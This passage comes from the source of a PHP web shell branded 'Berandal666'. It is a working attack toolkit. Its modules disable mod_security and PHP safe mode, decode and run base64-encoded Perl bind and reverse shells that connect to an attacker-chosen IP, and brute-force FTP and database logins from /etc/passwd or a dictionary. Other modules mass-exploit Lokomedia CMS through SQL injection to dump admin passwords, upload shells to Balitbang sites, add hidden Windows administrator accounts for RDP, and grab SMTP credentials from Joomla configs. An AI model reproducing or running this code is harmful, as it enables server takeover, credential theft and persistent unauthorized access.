  2954.     echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh  ] files create in following dir<br>| ".$GLOBALS['cwd']." |<br><br />";
  2955.     echo '<a href=? onclick="g(null,null,\'php.ini\',null)">| PHP.INI | </a><a href=? onclick="g(null,null,null,\'ini\')">| .htaccess(Mod) | </a><a href=? onclick="g(null,null,null,null,\'sh\')">| .htaccess(perl) | </a></center><br>';
  2956.     if(!empty($_POST['p2']) && isset($_POST['p2']))
  2957.     {
  2958.         $fil=fopen($GLOBALS['cwd'].".htaccess","w");
  2959.         fwrite($fil,'<IfModule mod_security.c>
  2960.             Sec------Engine Off
  2961.             Sec------ScanPOST Off
  2962.             </IfModule>');
  2963.         fclose($fil);
  2964.    }
  2965.    if(!empty($_POST['p1'])&& isset($_POST['p1']))
  2966.    {
  2967.         $fil=fopen($GLOBALS['cwd']."php.ini","w");
  2968.         fwrite($fil,'safe_mode=OFF
  2969.             disable_functions=NONE');
  2970.         fclose($fil);
  2971.     }
  2972.     if(!empty($_POST['p3']) && isset($_POST['p3']))
  2973.     {
  2974.         $fil=fopen($GLOBALS['cwd'].".htaccess","w");
  2975.         fwrite($fil,'Options FollowSymLinks MultiViews Indexes ExecCGI
  2976.         AddType application/x-httpd-cgi .sh
  2977.         AddHandler cgi-script .pl
  2978.         AddHandler cgi-script .pl');
  2979.         fclose($fil);
  2980.     }
  2981.     echo "</div>";
  2982.     echo '</div>';
  2983. }
  2984. elseif ($_GET['666'] == 'mailer') {
  2985. echo "<h1>Mailer</h1><hr color='white'>
  2986. <form method='POST'>
  2987. <table>
  2988. <tr><td>To (email):</td><td> <input type='text' name='to' style='border:0;border-bottom:1px solid #292929; width:500px;'>
  2989. <tr><td>From (name):</td><td> <input type='text' name='fromn' value='Berandal666' style='border:0;border-bottom:1px solid #292929; width:500px;'>
  2990. <tr><td>From (email):</td><td> <input type='text' name='frome' value='berandal@owlsquad.go.id' style='border:0;border-bottom:1px solid #292929; width:500px;'>
  2991. <tr><td>Subject:</td><td> <input type='text' name='subject' value='Something About Your Site :)' style='border:0;border-bottom:1px solid #292929; width:500px;'>
  2992. <tr><td>Message:</td><td> <textarea name='message' style='border:1px solid #292929' class='mybox' cols='35' width='400px' rows='10'></textarea>
  2993. <tr><td><input type='reset' value='Reset fields' name='reset'><td><input type='submit' value='Send e-mail' name='send'></td><td>
  2994. </table>
  2995. </form>
  2996. "; 
  2997. if(isset($_POST['send']))
  2998. {
  2999. // variables
  3000. $to = htmlentities(stripslashes($_POST['to']));
  3001. $fromn = htmlentities(stripslashes($_POST['fromn']));
  3002. $frome = htmlentities(stripslashes($_POST['frome']));
  3003. $subject = htmlentities(stripslashes($_POST['subject']));
  3004. $message = htmlentities(stripslashes($_POST['message']));
  3005. $headers = "From: $fromn <$frome>";
  3006. // variables
  3007. if($to && $fromn && $frome && $subject && $message && $headers) {
  3008. mail($to, $subject, $message, $headers);
  3009. echo "E-mail successfully sent to: ", $to;
  3010. }
  3011. }
  3012. }
  3013. elseif($_GET['666'] == 'loghunter')
  3014.     {
  3015. echo '<center class="mybox"><h1>Log Hunter</h1>';    
  3016. echo "<hr color='white'>";
  3017. echo "<form action=\"\" method=\"post\">\n";
  3018. ?><br>Dir :<input type="text" value="<?=getcwd();?>" style='border-color=white;' name="shc_dir"><?php
  3019. echo "<input type=\"submit\"  style='border-color=white;' name=\"submit\" class=\"kotak\" value=\"Scan!\"/>\n";
  3020. echo "</form>\n";
  3021. echo "<pre style=\"text-align: left;\">\n";
  3022. error_reporting(0);
  3023. /*
  3024. +--------------------------------------------+
  3025. Name    : Log Hunter (Grab Email)
  3026. Date    : 26/03/2016 05:53 PM
  3027. Link    : http://facebook.com/bug7sec
  3028. Link    : http://pastebin.com/u/shor7cut
  3029. Author  : Shor7cut
  3030. +--------------------------------------------+
  3031. Recoder : Berandal
  3032. Link    : http://twitter.com/id_berandal
  3033. Link    : http://pastebin.com/u/berandal666
  3034. +--------------------------------------------+
  3035. */
  3036.  
  3037.  
  3038. if($_POST['submit']){
  3039. function tampilkan($shcdirs){
  3040. foreach(scandir($shcdirs) as $shc)
  3041.     {
  3042.         if($shc!='.' && $shc!='..')
  3043.         {
  3044.             $shc = $shcdirs.DIRECTORY_SEPARATOR.$shc;
  3045.             if( !is_dir($shc) && !eregi("css", $shc) ){
  3046.  
  3047.                 $fgt    = file_get_contents($shc);
  3048.                 $ifgt   = exif_read_data($shc);
  3049.                 $jembut = "COMPUTED";
  3050.                 $taik   = "UserComment";
  3051.                 $shcm = "/mail['(']/";
  3052.                 if($ifgt[$jembut][$taik]){
  3053.                     echo "[<font color=#00FFD0>Stegano</font>] <font color=#2196F3>".$shc."</font><br>";
  3054.                 }
  3055.                 preg_match_all('#[A-Z0-9a-z._%+-]+@[A-Za-z0-9.+-]+#',$fgt,$cocok);
  3056.                 $hcs  = "/base64_decode/";
  3057.                 $exif = "/exif_read_data/";
  3058.                 preg_match($shcm, addslashes($fgt), $mailshc);
  3059.                 preg_match($hcs,  addslashes($fgt), $shcmar);
  3060.                 preg_match($exif, addslashes($fgt), $shcxif);
  3061.                 if(eregi('HTTP Cookie File', $fgt) || eregi('PHP Warning:', $fgt) ){
  3062.                 }
  3063.                 if(eregi('tmp_name', $fgt)){
  3064.                     echo "[<font color=#FAFF14>Uploader</font>] <font color=#2196F3>".$shc."</font><br>";
  3065.                 }
  3066.                 if($shcmar[0]){
  3067.                     echo "[<font color=#FF3D00>Base64</font>] <font color=#2196F3>".$shc."</font><br>";
  3068.                 }
  3069.                 if($mailshc[0]){
  3070.                     echo "[<font color=#E6004E>MailFunc</font>] <font color=#2196F3>".$shc."</font><br>";
  3071.                 }
  3072.                 if($shcxif[0]){
  3073.                     echo "[<font color=#00FFD0>Stegano</font>] <font color=#2196F3>".$shc."</font> </font><font color=red>{Manual Check}</font><br>";
  3074.                 }
  3075.                 if(eregi("js", $shc)){
  3076.                             echo "[<font color=red>Javascript</font>] <font color=#2196F3>".$shc."</font> { <a href=http://www.unphp.net target=_blank>CheckJS</a> }<br>";
  3077.                 }
  3078.                 if($cocok[0]){
  3079.                     foreach ($cocok[0] as $key => $shcmail) {
  3080.                         if (filter_var($shcmail, FILTER_VALIDATE_EMAIL)) {
  3081.                             echo "[<font color=yellow>SendMail</font>] <font color=#2196F3>".$shc."</font> { ".$shcmail." }<br>";
  3082.                         }
  3083.                     }
  3084.                 }
  3085.            
  3086.             }else{
  3087.                 tampilkan($shc);
  3088.             }
  3089.         }
  3090.     }
  3091. }
  3092. tampilkan($_POST['shc_dir']);
  3093. }
  3094. echo "</pre>\n";
  3095. echo "</Center>\n";}
  3096. elseif($_GET['666'] == 'network') {
  3097.     echo "<div class='mybox' style='text-align:left;'><form method='post'>
  3098.     <Font size='6pt'>Bind Port:</font><br><hr color='white'>
  3099.     &nbspPORT &nbsp&nbsp&nbsp&nbsp<input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' placeholder='port' name='port_bind' value='666'>
  3100.     <br><br><input type='submit' style='width: 50px; height: 30px; border-color=white;' class='kotak' name='sub_bp' value='Go!'>
  3101.     </form></div>
  3102.     <div class='mybox' style='text-align:left;'><form method='post'>
  3103.     <Font size='6pt'>Back Connect:</font> <br><hr color='white'>
  3104.     Server &nbsp&nbsp<input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'><br><br>
  3105.     PORT &nbsp&nbsp&nbsp&nbsp<input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' placeholder='port' name='port_bc' value='666'><br><br>
  3106.     <input type='submit' class='kotak' style='width: 50px; height: 30px; border-color=white;' name='sub_bc' value='Go!'>
  3107.     </form></div>
  3108.     <div class='mybox' style='text-align:left;'><form method='POST'>
  3109.     <Font size='6pt'>Metasploit Connection:</font> <br><hr color='white'>Your IP
  3110.     &nbsp<input placeholder='port' style='border:0;border-bottom:1px solid #292929; width:500px;' type='text' size='40' name='yip' value='".$my_ip."' /><br><br>
  3111.     Port&nbsp&nbsp&nbsp&nbsp&nbsp<input type='text' style='border:0;border-bottom:1px solid #292929; width:500px;' size='5' name='yport' value='666' />
  3112.     <br><br><input class='kotak' type='submit' style='width: 50px; height: 30px; border-color=white;margin:10px 2px 0 2px;' value='Go!' name='metaConnect'></form></div>";
  3113.    
  3114. ;
  3115.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  3116.     if(isset($_POST['sub_bp'])) {
  3117.         $f_bp = fopen("/tmp/bp.pl", "w");
  3118.         fwrite($f_bp, base64_decode($bind_port_p));
  3119.         fclose($f_bp);
  3120.  
  3121.         $port = $_POST['port_bind'];
  3122.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  3123.         sleep(1);
  3124.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  3125.         unlink("/tmp/bp.pl");
  3126.     }
  3127.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  3128.     if(isset($_POST['sub_bc'])) {
  3129.         $f_bc = fopen("/tmp/bc.pl", "w");
  3130.         fwrite($f_bc, base64_decode($bind_connect_p));
  3131.         fclose($f_bc);
  3132.  
  3133.         $ipbc = $_POST['ip_bc'];
  3134.         $port = $_POST['port_bc'];
  3135.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  3136.         sleep(1);
  3137.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  3138.         unlink("/tmp/bc.pl");
  3139.     }
  3140. }
  3141. elseif($_GET['666'] == 'brute') {
  3142. if( isset($_POST['proto']) ) {
  3143.         echo '<div class="mybox"><h1>Results</h1><hr color="white"><br><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'</div><br>';
  3144.         if( $_POST['proto'] == 'ftp' ) {
  3145.             function bruteForce($ip,$port,$login,$pass) {
  3146.                 $fp = @ftp_connect($ip, $port?$port:21);
  3147.                 if(!$fp) return false;
  3148.                 $res = @ftp_login($fp, $login, $pass);
  3149.                 @ftp_close($fp);
  3150.                 return $res;
  3151.             }
  3152.         } elseif( $_POST['proto'] == 'mysql' ) {
  3153.             function bruteForce($ip,$port,$login,$pass) {
  3154.                 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
  3155.                 @mysql_close($res);
  3156.                 return $res;
  3157.             }
  3158.         } elseif( $_POST['proto'] == 'pgsql' ) {
  3159.             function bruteForce($ip,$port,$login,$pass) {
  3160.                 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
  3161.                 $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
  3162.                 @pg_close($res);
  3163.                 return $res;
  3164.             }
  3165.         }
  3166.         $success = 0;
  3167.         $attempts = 0;
  3168.         $server = explode(":", $_POST['server']);
  3169.         if($_POST['type'] == 1) {
  3170.             $temp = @file('/etc/passwd');
  3171.             if( is_array($temp) )
  3172.                 foreach($temp as $line) {
  3173.                     $line = explode(":", $line);
  3174.                     ++$attempts;
  3175.                     if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
  3176.                         $success++;
  3177.                         echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
  3178.                     }
  3179.                     if(@$_POST['reverse']) {
  3180.                         $tmp = "";
  3181.                         for($i=strlen($line[0])-1; $i>=0; --$i)
  3182.                             $tmp .= $line[0][$i];
  3183.                         ++$attempts;
  3184.                         if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
  3185.                             $success++;
  3186.                             echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
  3187.                         }
  3188.                     }
  3189.                 }
  3190.         } elseif($_POST['type'] == 2) {
  3191.             $temp = @file($_POST['dict']);
  3192.             if( is_array($temp) )
  3193.                 foreach($temp as $line) {
  3194.                     $line = trim($line);
  3195.                     ++$attempts;
  3196.                     if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
  3197.                         $success++;
  3198.                         echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
  3199.                     }
  3200.                 }
  3201.         }
  3202.         echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
  3203.     }
  3204.     echo '<div class="mybox"><h1>FTP bruteforce</h1><hr color="white"><div class=content><table><form method=post><tr><td><span>Type</span></td>'
  3205.         .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
  3206.         .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
  3207.         .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
  3208.         .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
  3209.         .'<span>Server:port</span></td>'
  3210.         .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
  3211.         .'<tr><td><span>Brute type</span></td>'
  3212.         .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
  3213.         .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
  3214.         .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
  3215.         .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
  3216.         .'<td><input type=text style="border-color=white;" name=login value="berandal"></td></tr>'
  3217.         .'<tr><td><span>Dictionary</span></td>'
  3218.         .'<td><input type=text style="border-color=white;" name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
  3219.         .'</td></tr><tr><td></td><td><input class="kotak" type=submit value=">>"></td></tr></form></table>';
  3220.     echo '</div></div>';}
  3221.     elseif($_GET['666'] == 'lokmed')
  3222.     {
  3223. ?>
  3224. <center class='mybox'><h1>CMS Lokomedia Auto Exploiter</h1>
  3225. <form method='post'>
  3226. <textarea name='sites' style='border-color=white;' value='contoh:http://127.0.0.1/hal-tentang-kami.html' cols='50' rows='12'></textarea><br><br>
  3227. <input type='submit' name='go' value='SIKAT!' style='border-color=white;' class='kotak'>
  3228. </FORM></center>
  3229. <?php
  3230. error_reporting(0);
  3231. set_time_limit(0);
  3232. $ya=$_POST['go'];
  3233. $co=$_POST['sites'];
  3234.  
  3235. if($ya){
  3236. $e=explode("rn",$co);
  3237. foreach($e as $bda){    
  3238. $fp = fopen("cookie.txt", "w+");
  3239. $Cookie = realpath('cookie.txt');
  3240. $web = $bda."/statis--1'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+-profil.html";
  3241. $curl=curl_init();
  3242. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  3243. curl_setopt($curl,CURLOPT_URL,"$web");
  3244. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
  3245. curl_setopt($curl,CURLOPT_SSL_VERIFYPEER, false);
  3246. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  3247. curl_setopt($curl,CURLOPT_COOKIEFILE, "$Cookie");
  3248. curl_setopt($curl,CURLOPT_TIMEOUT,5);
  3249. $gweb = curl_exec($curl);
  3250. $web2 = $bda."/statis--1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html";
  3251. $curl2=curl_init();
  3252. curl_setopt($curl2,CURLOPT_RETURNTRANSFER,1);
  3253. curl_setopt($curl2,CURLOPT_URL,"$web2");
  3254. curl_setopt($curl2,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
  3255. curl_setopt($curl2,CURLOPT_SSL_VERIFYPEER, false);
  3256. curl_setopt($curl2,CURLOPT_FOLLOWLOCATION,1);
  3257. curl_setopt($curl2,CURLOPT_COOKIEFILE, "$C2ookie");
  3258. curl_setopt($curl2,CURLOPT_TIMEOUT,5);
  3259. $gweb2 = curl_exec($curl2);
  3260. echo '<center><font face="courier" color="#00BFFF" >'.$bda.'</font><br><textarea rows="10" cols="40">'.htmlentities($gweb2).'</textarea>','<textarea rows="10" cols="40">'.htmlentities($gweb).'</textarea>';
  3261. $cek_admin = @file_get_contents("$bda/adminweb");
  3262. if(preg_match("/Copyright/", $cek_admin)) {
  3263.                 echo "<BR><font color=green>Berandal</font> => <font color=white><a href='$bda/adminweb' target='_blank'>$bda/adminweb</a></font><br>";
  3264.                 } else {
  3265.                 echo "<br><br>[-] <font color=red> Gak Ada /adminweb, Jancok! -_-</font>[-]<br><br><hr color='white'>";
  3266. }}}}
  3267.  
  3268.  
  3269. elseif($_GET['666'] == 'balitbang') {
  3270. ?>
  3271. <div class='mybox'><h1>CMS Balitbang Auto Exploiter</h1>
  3272. <form action='' method='post'>
  3273. <center>
  3274. <p>Target URL : <input style='border-color=white;' type='text' name='url' class='text' placeholder='http://127.0.0.1/' size="50"></p>
  3275. </td></p>
  3276. <p><input type='submit' name='send' class='kotak' style='border-color=white;' value='Kunci Target'></p></center>
  3277. </form>
  3278. <?php
  3279. if (isset($_POST['send'])) {
  3280.     $url = $_POST['url'];
  3281.     $resulturl = "Target URL : $url";
  3282.     echo "<center>
  3283. <hr color='white'><br>
  3284. $resulturl
  3285. $resultoken
  3286. </center>";
  3287. echo '<center style="border-color=white;"><form enctype="multipart/form-data" action="'.$url.'/files/tugas/tgs-ganteng.phtml" method="post"></center>';
  3288. echo '<center style="border-color=white;"><input name="file" type="file"><input type="submit" class="kotak" value="Upload"><br><br>Format file: shell.phtml ato shell.php5</center>';
  3289. }
  3290. echo "</div>";
  3291. }
  3292. elseif($_GET['666'] == 'hashid') {
  3293. if (isset($_POST['gethash'])) {
  3294.         $hash = $_POST['hash'];
  3295.         if (strlen($hash) == 32) {
  3296.             $hashresult = "MD5 Hash";
  3297.         } elseif (strlen($hash) == 40) {
  3298.             $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
  3299.         } elseif (strlen($hash) == 13) {
  3300.             $hashresult = "DES(Unix) Hash";
  3301.         } elseif (strlen($hash) == 16) {
  3302.             $hashresult = "MySQL Hash / /DES(Oracle Hash)";
  3303.         } elseif (strlen($hash) == 41) {
  3304.             $GetHashChar = substr($hash, 40);
  3305.             if ($GetHashChar == "*") {
  3306.                 $hashresult = "MySQL5 Hash";
  3307.             }
  3308.         } elseif (strlen($hash) == 64) {
  3309.             $hashresult = "SHA-256 Hash";
  3310.         } elseif (strlen($hash) == 96) {
  3311.             $hashresult = "SHA-384 Hash";
  3312.         } elseif (strlen($hash) == 128) {
  3313.             $hashresult = "SHA-512 Hash";
  3314.         } elseif (strlen($hash) == 34) {
  3315.             if (strstr($hash, '$1$')) {
  3316.                 $hashresult = "MD5(Unix) Hash";
  3317.             }
  3318.         } elseif (strlen($hash) == 37) {
  3319.             if (strstr($hash, '$apr1$')) {
  3320.                 $hashresult = "MD5(APR) Hash";
  3321.             }
  3322.         } elseif (strlen($hash) == 34) {
  3323.             if (strstr($hash, '$H$')) {
  3324.                 $hashresult = "MD5(phpBB3) Hash";
  3325.             }
  3326.         } elseif (strlen($hash) == 34) {
  3327.             if (strstr($hash, '$P$')) {
  3328.                 $hashresult = "MD5(Wordpress) Hash";
  3329.             }
  3330.         } elseif (strlen($hash) == 39) {
  3331.             if (strstr($hash, '$5$')) {
  3332.                 $hashresult = "SHA-256(Unix) Hash";
  3333.             }
  3334.         } elseif (strlen($hash) == 39) {
  3335.             if (strstr($hash, '$6$')) {
  3336.                 $hashresult = "SHA-512(Unix) Hash";
  3337.             }
  3338.         } elseif (strlen($hash) == 24) {
  3339.             if (strstr($hash, '==')) {
  3340.                 $hashresult = "MD5(Base-64) Hash";
  3341.             }
  3342.         } else {
  3343.             $hashresult = "Hash type not found";
  3344.         }
  3345.     } else {
  3346.         $hashresult = "Not Hash Entered";
  3347.     }
  3348. ?>
  3349.     <div class='mybox' style="text-align:left">
  3350.         <form action="" method="POST">
  3351.         <tr>
  3352.         <table >
  3353.         <h1>Hash Identifier</h1>
  3354.         <tr class="optionstr"><B><td>String</td></b><td>:</td>  
  3355.         <td><input style='border:0;border-bottom:1px solid #292929; width:500px;' type="text" name="hash" size='60'/></td>
  3356.         <td><input type="submit" class="kotak" name="gethash" value="Identify Hash" /></td></tr>
  3357.         <tr class="optionstr"><b><td>Hasil</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
  3358.     </table></tr></form><br>
  3359.     </div>
  3360. <?php
  3361. }
  3362. elseif($_GET['666'] == 'krdp') {
  3363.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  3364.         if($_POST['create']) {
  3365.             $user = htmlspecialchars($_POST['user']);
  3366.             $pass = htmlspecialchars($_POST['pass']);
  3367.             if(preg_match("/$user/", exe("net user"))) {
  3368.                 echo "<div class='mybox'>[INFO] -> <font color=red>user <font color=white>$user</font> sudah ada</font></div>";
  3369.             } else {
  3370.                 $add_user   = exe("net user $user $pass /add");
  3371.                 $add_groups1 = exe("net localgroup Administrators $user /add");
  3372.                 $add_groups2 = exe("net localgroup Administrator $user /add");
  3373.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
  3374.                 echo "<div class='mybox'>[ RDP ACCOUNT INFO ]<br>
  3375.                 ------------------------------<br>
  3376.                 IP: <font color=white>".$ip."</font><br>
  3377.                 Username: <font color=white>$user</font><br>
  3378.                 Password: <font color=white>$pass</font><br>
  3379.                 ------------------------------<br><br>
  3380.                 [ STATUS ]<br>
  3381.                 ------------------------------<br>
  3382.  
  3383.                 ";
  3384.                 if($add_user) {
  3385.                     echo "[add user] -> <font color='white'>Berhasil</font><br>";
  3386.                 } else {
  3387.                     echo "[add user] -> <font color='red'>Gagal</font><br>";
  3388.                 }
  3389.                 if($add_groups1) {
  3390.                     echo "[add localgroup Administrators] -> <font color='white'>Berhasil</font><br>";
  3391.                 } elseif($add_groups2) {
  3392.                     echo "[add localgroup Administrator] -> <font color='white'>Berhasil</font><br>";
  3393.                 } elseif($add_groups3) {
  3394.                     echo "[add localgroup Administrateur] -> <font color='white'>Berhasil</font><br>";
  3395.                 } else {
  3396.                     echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  3397.                 }
  3398.                 echo "------------------------------<br></div>";
  3399.             }
  3400.         } elseif($_POST['s_opsi']) {
  3401.             $user = htmlspecialchars($_POST['r_user']);
  3402.             if($_POST['opsi'] == '1') {
  3403.                 $cek = exe("net user $user");
  3404.                 echo "<div class='mybox'>Checking username <font color=white>$user</font> ....... ";
  3405.                 if(preg_match("/$user/", $cek)) {
  3406.                     echo "[ <font color=white>Sudah ada</font> ]<br>
  3407.                     ------------------------------<br><br>
  3408.                     <pre>$cek</pre>";
  3409.                 } else {
  3410.                     echo "[ <font color=red>belum ada</font> ]</div>";
  3411.                 }
  3412.             } elseif($_POST['opsi'] == '2') {
  3413.                 $cek = exe("net user $user berandal");
  3414.                 if(preg_match("/$user/", exe("net user"))) {
  3415.                     echo "[change password: <font color=white>berandal</font>] -> ";
  3416.                     if($cek) {
  3417.                         echo "<font color=white>Berhasil</font>";
  3418.                     } else {
  3419.                         echo "<font color=red>Gagal</font>";
  3420.                     }
  3421.                 } else {
  3422.                     echo "<div class='mybox'>[INFO] -> <font color=red>user <font color=white>$user</font> belum ada</font></div>";
  3423.                 }
  3424.             } elseif($_POST['opsi'] == '3') {
  3425.                 $cek = exe("net user $user /DELETE");
  3426.                 if(preg_match("/$user/", exe("net user"))) {
  3427.                     echo "[remove user: <font color=white>$user</font>] -> ";
  3428.                     if($cek) {
  3429.                         echo "<font color=white>Berhasil</font>";
  3430.                     } else {
  3431.                         echo "<font color=red>Gagal</font>";
  3432.                     }
  3433.                 } else {
  3434.                     echo "<div class='mybox'>[INFO] -> <font color=red>user <font color=white>$user</font> belum ada</font></div>";
  3435.                 }
  3436.             } else {
  3437.                 //
  3438.             }
  3439.         } else {
  3440.             echo "<div class='mybox'>
  3441.             <h1>K-RDP Shell</h1><br>
  3442.             -- Create RDP --
  3443.             <form method='post'>
  3444.             <input type='text' style='border-color=white;' name='user' placeholder='username' value='berandal' required>
  3445.             <input type='text' style='border-color=white;' name='pass' placeholder='password' value='berandal' required>
  3446.             <input type='submit' style='border-color=white;' class='kotak' name='create' value='>>'>
  3447.             </form>
  3448.             -- Option --
  3449.             <form method='post'>
  3450.             <input type='text' style='border-color=white;' name='r_user' placeholder='username' required>
  3451.             <select name='opsi' style='border-color=white;'>
  3452.             <option value='1'>Cek Username</option>
  3453.             <option value='2'>Ubah Password</option>
  3454.             <option value='3'>Hapus Username</option>
  3455.             </select>
  3456.             <input type='submit' style='border-color=white;' class='kotak' name='s_opsi' value='>>'>
  3457.             </form></div>
  3458.             ";
  3459.         }
  3460.     } else {
  3461.         echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.";
  3462.     }
  3463. }
  3464. elseif($_GET['666'] == 'smtp') {
  3465.     echo "<center class='mybox'><h1>SMTP Grabber</h1><hr color='white'><br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/os_config )</span><br><br>";
  3466.     function scj($dir) {
  3467.         $dira = scandir($dir);
  3468.         foreach($dira as $dirb) {
  3469.             if(!is_file("$dir/$dirb")) continue;
  3470.             $ambil = file_get_contents("$dir/$dirb");
  3471.             $ambil = str_replace("$", "", $ambil);
  3472.             if(preg_match("/JConfig|joomla/", $ambil)) {
  3473.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
  3474.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  3475.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  3476.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  3477.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
  3478.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  3479.                 echo "SMTP Host: <font color=white>$smtp_host</font><br>";
  3480.                 echo "SMTP port: <font color=white>$smtp_port</font><br>";
  3481.                 echo "SMTP user: <font color=white>$smtp_user</font><br>";
  3482.                 echo "SMTP pass: <font color=white>$smtp_pass</font><br>";
  3483.                 echo "SMTP auth: <font color=white>$smtp_auth</font><br>";
  3484.                 echo "SMTP secure: <font color=white>$smtp_secure</font><br><br></center>";
  3485.             }
  3486.         }
  3487.     }
  3488.     $smpt_hunter = scj($dir);
  3489.     echo $smpt_hunter;
  3490. } elseif($_GET['666'] == 'auto_wp') {
  3491.     if($_POST['sikat']) {
  3492.         $title = htmlspecialchars($_POST['new_title']);
  3493.         $pn_title = str_replace(" ", "-", $title);
  3494.         if($_POST['cek_edit'] == "Y") {
  3495.             $script = $_POST['edit_content'];
  3496.         } else {
  3497.             $script = $title;
  3498.         }
  3499.         $conf = $_POST['config_dir'];
  3500.         $scan_conf = scandir($conf);
  3501.         foreach($scan_conf as $file_conf) {
  3502.             if(!is_file("$conf/$file_conf")) continue;
